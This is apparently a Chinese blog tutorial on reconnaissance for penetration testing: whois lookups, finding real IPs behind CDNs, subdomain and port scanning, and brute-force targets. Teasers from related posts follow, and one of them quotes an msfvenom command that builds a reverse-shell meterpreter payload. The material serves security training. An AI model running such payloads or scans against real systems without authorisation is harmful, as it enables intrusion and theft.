代码编织梦想

细谈渗透测试的前期工作——信息收集


前言

都说学安全的,查资料找信息什么的都是基本功,收集信息的能力都是杠杠的,经常网上有什么热门的事情,小伙伴们都会来找我帮他们找点瓜吃,也常常让我帮忙找特定的一些岛国教育资料,真是工具人实锤了。。咳咳扯远了,扯远了。
在这里插入图片描述
所谓知己知彼,百战不殆,要做好渗透测试,前期的信息收集工作可以说是非常重要了,在面试中这也是高频出现的问题,可能感觉很简单,但是其中还是有很多不可忽略的小细节,往往就是这些小细节决定能否成功渗透的一个因素。


0x01 收集什么信息

  1. whois信息
  2. 备案信息
  3. 网站架构信息
  4. DNS信息
  5. 查找真实IP
  6. C段
  7. 子域名
  8. 旁站
  9. 端口
  10. WAF探测
  11. 指纹识别
  12. 收集敏感信息

0x02 作用和收集方法

  1. Whois 信息
    主要信息包括:域名注册人信息(电话号码、名字、邮箱等)。
    作用:若站点是中小型网站,注册人很可能是管理员,可以通过注册人信息进行反查,扩大信息收集范围。也可以通过社会工程学来了解注册人的其他信息。(思维扩散,方法有很多)但是whois的信息不是百分百正确的,还需要自己判断。

  2. 备案信息
    在国内,网站所有者是需要向国家备案网站信息的,一般通过站长之家或者天眼查或者备案巴巴一类的网站来查询备案信息,而且一般都要付费。
    作用:利于社工的前期数据积累。

  3. 网站架构信息
    主要包括:网站建站使用的数据库、web容器、后端语言、服务器系统等。
    工具:我自己喜欢用的是wapplayzer这个浏览器插件,还有云悉、NMAP、AWVS等。
    wapplayzer

  4. DNS信息
    作用:建站者对 DNS 配置不适当,可能导致网站被DDOS,或是出现域传送、拒绝服务、DNS 重绑定等漏洞,对站点造成安全隐患。
    在whois信息中通常包含了DNS信息。

  5. 真实IP
    在一些访问量比较大的站点,通常会采用CDN,这时肯定会有小伙伴问什么是CDN呢?
    CND全称 Content Delivery Network,即内容分发网络,为了避免网络拥塞,在访问服务器时,CDN技术自动为我们提供最优的节点,这个节点同样拥有服务器提供给用户的数据和资源,这样既提高了用户的体验,同时降低了主服务器的压力。
    详解可以看看这篇博文,写的很生动:[漫话:如何给女朋友解释什么是CDN?]

    真实IP的获取就比较麻烦了,对没有CDN的网站来说,直接ping就可以了,但是配置了CDN的话,有以下方法可以推测真实IP:
    (1)内部邮箱源。
    一般邮箱系统都在内部,不会通过 CDN。许多网站都会自带 Sendmail,通过 RSS 订阅或是注册用户可获取邮件,查看源码可获取真实 IP。但需要注意的是,有的网站会使用第三方邮件服务器,如非目标自己的邮件服务器则此方法不可行。
    (2)子域名。
    许多网站仅对主站和流量大的子站进行CDN 的配置,而流量小的子站与主站处于同一台服务器或是同一个 C 段内。
    (3)国外主机访问。
    许多 CDN 的服务商由于各种原因,仅对国内线路支持加速服务,若使用国外主机对域名进行解析则可能会得到真实 IP。Rage4,ZoneEdit 等可提供国外域名解析服务,CA App Synthetic Monitor可提供国外 ping 测试服务。
    (4)历史解析记录。
    若是目标站点很久以前没有使用 CDN,通过查看目标域名的历史解析记录,可能得到真实 IP。Netcraft.com、微步社区等可查询相关讯息,SecurityTrails平台也可精确找寻真实原始 IP 讯息。
    (5)空间引擎。
    利用 fofa,shodan 等网络空间搜索引擎的相关搜索格式进行搜索,有可能获得相关关键字的 IP 信息,具体搜索语法可参照其站语法规则,此处不多赘述。
    (6)SSL 证书。
    通过 censys.io,搜索者可输入实际的查询参数来扫描有效证书,进而获取被暴露的 SSL证书相关的 Web 服务器 IP。

  6. C站
    作用:有一些学校、公司等机构持有整个IP 段,则该 IP 段中所有 IP 都同属其资产。对目标进行 C 段扫描可收集 C 段内属于目标的 IP,也可探测目标主机的资产。一些具有内部服务站点的 IP 并没有对外映射域名,只能 IP 访问,此类站点也可由 C 段扫描进行收集 。
    工具:NMAP、Masscan等。

  7. 子域名收集
    作用:主站访问量大,防护措施相对而言会高,可考虑收集子域名信息来扩大攻击范围。同一域名下的二级域名都属于同一资产,一般而言都会有相关的联系,如处于内网、同一数据来源等。
    工具:搜索引擎语法(site:xxx.com)、站长之家、Layer 子域名挖掘机等。

  8. 旁站查询
    作用:旁站是指与目标站点处于同一服务器的网站,已获授权的情况下,若主站渗透无果,可以尝试进行旁站的渗透。攻击旁站成功的情况下,旁站与主站若处同一机器,则可攻击主站,若处同一内网,可进行内网渗透。
    工具:站长一类的在线查询。

  9. 端口探测
    作用:探测服务端口,有两个作用:一是发现新的资产,同一服务器上不同端口可能对应不同的Web 网站,扫描发现新的站点并攻击下来可以对目标站点构成威胁 。二是找到易受攻击的服务,某些危险端口开放了也可尝试入侵,如 445 端口存在永恒之蓝漏洞,6379 端口存在 redis 未授权访问漏洞等,许多类似于 3306,22,1433 等端口可以尝试爆破或攻击存在漏洞的服务。端口工具:常见的有 Nmap、御剑扫描和 Masscan 等。

  10. WAF探测
    许多工具可用于 WAF 检测,如 Wafw00f、Sqlmap、Nmap 等。

  11. 敏感信息
    信息的泄露内容大致可分为用户的内容敏感信息和 Web 服务器信息。
    用户敏感信息泄露一般可以用搜索引擎语法来查找,类似包含身份证号码的表格、包含服务器账号密码的文件等。
    服务器敏感信息可以通过目录扫描来查找可用的一些敏感目录,有用的信息如robots.txt,phpinfo(),admin.php, .htaccess文件,一些废弃的源码文件,后台管理地址等等。工具可使用御剑、DirBuster等。

总结

渗透测试中,收集到的信息是越多越好的,除了技术方面,社会工程学也是富有成效的一种收集信息的方法,所以要成为一名合格的渗透测试人员还得会聊天啊hhh。


参考文献:浅析WEB渗透信息收集[J].邓泽龙. 电子元器件与信息技术.2020,4(4):24-25+32.

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接: https://blog.csdn.net/ElsonHY/article/details/110478307

全文检索工具elasticsearch-爱代码爱编程

二 .全文检索工具elasticsearch 1 . lucene与elasticsearch 咱们之前讲的处理分词,构建倒排索引,等等,都是这个叫lucene的做的。那么能不能说这个lucene就是搜索引擎呢? 还不能。lucene只是一个提供全文搜索功能类库的核心工具包,而真正使用它还需要一个完善的服务框架搭建起来的应用。 好比lucene是类似于j

什么是搜索-爱代码爱编程

一、搜索 什么是搜索, 计算机根据用户输入的关键词进行匹配,从已有的数据库中摘录出相关的记录反馈给用户。 常见的全网搜索引擎,像百度、谷歌这样的。但是除此以外,搜索技术在垂直领域也有广泛的使用,比如淘宝、京东搜索商品,万芳、知网搜索期刊,csdn中搜索问题贴。也都是基于海量数据的搜索。1 如何处理搜索 1.1用传统关系性数据库 弊端: 1、 对于传

网站TDK标题的正确写法-爱代码爱编程

什么是TDK? T:title D:meta-description K:meta-keywords TDK的重要性 TDK占比40%的排名得分,没有关键词,网站几乎不会有排名。 书写格式 (1) 标题title: 字数32个字左右格式:关键词1-关键词2-关键词3-品牌词例如: <title>杯子-水杯子生产厂家提供双层玻璃杯订

Linux环境下在tomcat8容器上部署solr搜索引擎服务器-爱代码爱编程

一.Solr的定义 Solr是一个独立的企业级搜索应用服务器,它是用Java编写、运行在Servlet容器(如Apache Tomcat或Jetty)上的一个独立的全文搜索引擎。它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得

内容行业搜索排序表达式的最佳实践-爱代码爱编程

某新闻资讯平台,在内容搜索场景中需要满足业务多样化,个性化的需求,在query改写配置好后,希望在排序阶段进行优化,实现强大的相关性排序效果,提高用户点击率。今天会结合几个典型场景该如何来思考和设计排序因子,和大家详解特征性函数的应用 Query在开放搜索的执行流程 阿里云开放搜索排序表达式配置 接下来给大家分析几个常见的排序优化需求: 场

一度智信电商|店铺排名太低?快来看看几点,快速提升排名-爱代码爱编程

一度智信电商|店铺排名太低?快来看看几点,快速提升排名 相信很多商家在拼多多开店,都会希望自家店铺排名靠前,因为排名越靠前,店铺的流量就越大,销量也越高。 但是大部分商家并不知道,影响店铺排名的因素有哪些,所以在做商品的优化排名时,往往不知道从哪里下手,简单认为花钱推广提升销量就可以,其实这是一种误区。 那么,有哪些因素对店铺排名影响最大呢?下面一度智

【渗透笔记】Windows主机信息收集-爱代码爱编程

在拿到webshell的时候,想办法获得系统信息拿到系统权限,进入到网络系统内部之后收集内部网络的各种信息,获取内部网络有价值的人员、资产信息。 内网渗透的第一步,内网信息收集。 环境搭建 ATT&CK靶场二 内网环境分析 内网基础环境判断 IP、网关、DNS、是否能联通外网、网络连接以及端口、本机host文件、机器的代理、是否在域内、

msf中收到了sessions却不反弹meterpreter的原因-爱代码爱编程

msf中收到了sessions却不反弹meterpreter的原因 问题描述: 生成木马 ​msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.189.130 lport=12346 -f exe >/hack.exe

CVE-2020-0796漏洞利用-爱代码爱编程

CVE-2020-0796漏洞利用 漏洞背景 微软3月11日发布,披露地址: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0796 此次漏洞很接近2017年的永恒之蓝漏洞(ms17_010),都是利用445端口的SMB进行攻击 而且攻击者可以构造特定的网页,压缩包,共享目录,OFF

DVWA在Mac上的安装配置-爱代码爱编程

DVWA在Mac上的安装配置 此处使用的是XAMPP+DVWA 刚开始配置DVWA,在网上找了一大波教程,其中有几个步骤总是有点懵逼,所以自己写了一个比较简单的配置步骤,希望对大家的学习有帮助。 一、解压安装DVWA XAMPP下载地址DVWA下载地址 安装XAMPP,与普通应用安装相同 安装好之后运行XAMPP 在Services中打

CEH v11 笔记总结 Module 2-爱代码爱编程

CEH v11 笔记 Module 2 Footprinting and Reconnaissance 1. Footprinting Concepts 1.1. What is Footprinting An essential aspect of footprinting is identifying the level of risk ass

深信服校园招聘安全攻防A卷-爱代码爱编程

深信服校园招聘安全攻防A卷 1、谈谈在WEB类安全问题的应急处置过程中web日志溯源攻击路径的思路? 在对WEB日志进行安全分析时,可以按照下面两种思路展开,逐步深入,还原整个攻击过程。 首先确定受到攻击的时间范围,以此为线索,查找这个时间范围内可疑的日志,根据可疑ip、攻击特征等进一步排查(WEB日志会记录客户端对WEB应用的访问请求,这其中包括正常